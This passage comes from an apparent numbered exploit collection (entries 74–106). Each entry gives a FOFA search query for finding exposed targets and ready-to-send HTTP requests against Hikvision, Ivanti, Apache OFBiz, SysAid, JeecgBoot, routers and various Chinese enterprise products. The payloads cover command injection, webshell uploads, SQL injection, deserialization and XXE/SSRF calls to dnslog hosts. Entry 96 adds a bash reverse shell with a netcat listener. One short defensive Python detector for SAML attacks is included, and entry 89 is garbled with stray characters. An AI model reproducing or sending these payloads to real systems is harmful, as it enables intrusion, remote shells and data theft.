User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
    "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
    "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp
86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

. e9 X" G' I6 H89. 致远互联FE协作办公平台editflow_manager存在sql注入6 z4 D& `1 y5 p9 E; W: m" ~
FOFA:title="FE协作办公平台" || body="li_plugins_download"( C8 |9 ?0 ^# l. q% U& c6 }
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
( b# z |+ S2 R1 w: X; U" J2 jHost: x.x.x.x
8 ^" ]$ J7 R. v: A8 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 O$ i9 v) B5 TConnection: close
1 {+ V6 |+ Y) y9 VContent-Length: 41* X8 k. {5 }" j: r+ |& w
Content-Type: application/x-www-form-urlencoded
1 x4 ^' Q# v# k6 M; Z) `4 lAccept-Encoding: gzip, C1 O: o9 z1 _3 W% E1 q+ I
; v% q* S+ l6 X" ]+ ~3 C4 f5 a
option=2&GUID=-1'+union+select+111*222--+
0 A- ~: q/ a9 w' G0 v- H' F4 J+ q! z$ ]0 G$ z9 h1 T( b
& F2 ~/ M/ C: m- `
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the serialized payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Empty USERNAME/PASSWORD values together with requirePasswordChange=Y get the request past the login check. The XML-RPC request body, including the <serializable> extension element, is parsed and deserialized before the method name is dispatched, which is why the method name can be random.

Generate the payload with ysoserial (CommonsBeanutils1 gadget chain; the command only triggers a DNS lookup, so success is observed out of band on the dnslog host):
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated string for the placeholder in the POC above, and recompute Content-Length for the actual body:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

The Groovy script runs the command and throws its output as the exception message, so the result comes back in the error response. The same requirePasswordChange=Y bypass as in the previous entry is what lets an unauthenticated client reach ProgramExport.

Reverse shell
Start a listener on the Kali box:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

Check before use: the base64 string in the published POC decodes to bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1, with URL-encoded spaces that the target shell will not interpret. Regenerate it from the plain command, with your own listener address, and recompute Content-Length:
echo -n 'bash -i >& /dev/tcp/192.168.40.128/7777 0>&1' | base64 -w0

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

PAYLOAD stands for the full Shiro rememberMe cookie (the serialized gadget chain encrypted with the application's key), which the source omits for length; the command to run is carried in the X-Token-Data header.

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

The leading %7D (}) and trailing %7B ({) keep the braces of the generated function definition balanced around the injected code; the Java call runs through the script engine when the function is saved, and a DNS query on the dnslog host confirms it.

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

URL-decoded, the body is {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}. The param string reaches a shell unescaped, so "hello" in the response shows that the piped command after the address was executed.

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

The endpoint accepts the .php filename without checking the extension; the response gives the path where the file was stored.

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The ../../ segments reach /api/v1/license/keys-status/ through the unauthenticated totp path, and the %3b (;) terminates the command that endpoint builds so that the curl after it runs; a DNS or HTTP hit on the dnslog host confirms execution.

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The signature value is junk; what matters is the RetrievalMethod URI, which the SAML component fetches before it validates anything, so a DNS or HTTP request from the appliance to the dnslog host confirms the SSRF.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML (a parameter entity whose external DTD is fetched when the document is parsed, so the dnslog host sees the request):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

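Entries 102 and 103 both make the appliance reach out to an attacker host from inside a SAML message, one through a signature's RetrievalMethod URI and one through an external DTD. The Python below is an added example, not part of the published POCs or of any Ivanti component: it decodes a SAMLRequest value (plain base64 as used here, or base64 over raw DEFLATE for the redirect binding), scans the raw XML text for a DOCTYPE, external entity declarations and RetrievalMethod URIs, and lists the hosts the server would contact. Regexes are used deliberately, since an XML parser would either reject the DOCTYPE or hide it. Function names and the allow-list parameter are mine; the two samples are the SAMLRequest value and the KeyInfo part of the SOAP body published above.

```python
import base64
import re
import zlib
from urllib.parse import urlsplit

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*"([^"]+)"', re.I)
RETRIEVAL_METHOD_RE = re.compile(
    r'<(?:\w+:)?RetrievalMethod\b[^>]*\bURI\s*=\s*"([^"]+)"', re.I)


def decode_saml_request(value):
    """Recover the XML from a SAMLRequest value: plain base64 (POST binding, as in
    entry 103) or base64 over raw DEFLATE (HTTP-Redirect binding)."""
    raw = base64.b64decode(value)
    if raw.lstrip().startswith(b"<"):
        return raw.decode("utf-8", "replace")
    try:
        return zlib.decompress(raw, -15).decode("utf-8", "replace")
    except zlib.error:
        return raw.decode("utf-8", "replace")


def saml_indicators(xml_text):
    """(kind, url) pairs: 'doctype' and 'external-entity' for XXE (entry 103),
    'retrieval-method' for a signature that makes the server fetch a key (entry 102)."""
    hits = []
    if DOCTYPE_RE.search(xml_text):
        hits.append(("doctype", None))
    for url in EXTERNAL_ENTITY_RE.findall(xml_text):
        hits.append(("external-entity", url))
    for uri in RETRIEVAL_METHOD_RE.findall(xml_text):
        hits.append(("retrieval-method", uri))
    return hits


def unexpected_hosts(hits, allowed_hosts=()):
    """Hosts the appliance would be made to contact that are not a known IdP."""
    hosts = set()
    for _kind, url in hits:
        host = urlsplit(url or "").hostname
        if host and host not in allowed_hosts:
            hosts.add(host)
    return sorted(hosts)


# The SAMLRequest value from entry 103 and the KeyInfo fragment from entry 102, as published.
SAMPLE_SAML_REQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)
SAMPLE_SOAP_SIGNATURE = (
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:KeyInfo>'
    '<ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo>'
    '</ds:Signature></soap:Body></soap:Envelope>'
)

if __name__ == "__main__":
    xml_text = decode_saml_request(SAMPLE_SAML_REQUEST)
    print(saml_indicators(xml_text), unexpected_hosts(saml_indicators(xml_text)))
    print(saml_indicators(SAMPLE_SOAP_SIGNATURE))
```

Pass the hostnames of your real identity providers as allowed_hosts; anything else returned by unexpected_hosts is either a test from a scanner or an exploitation attempt, and for an unpatched appliance the second request (not the first) is the one to hunt for in the logs.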
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

An empty token is accepted; the response carries the system status configuration.

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
(URL as published, truncated in the source. The injection point is the updatexml() expression used as a query parameter name rather than as a value, the same pattern as the two entries below; the md5 result appears in the error message.)

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
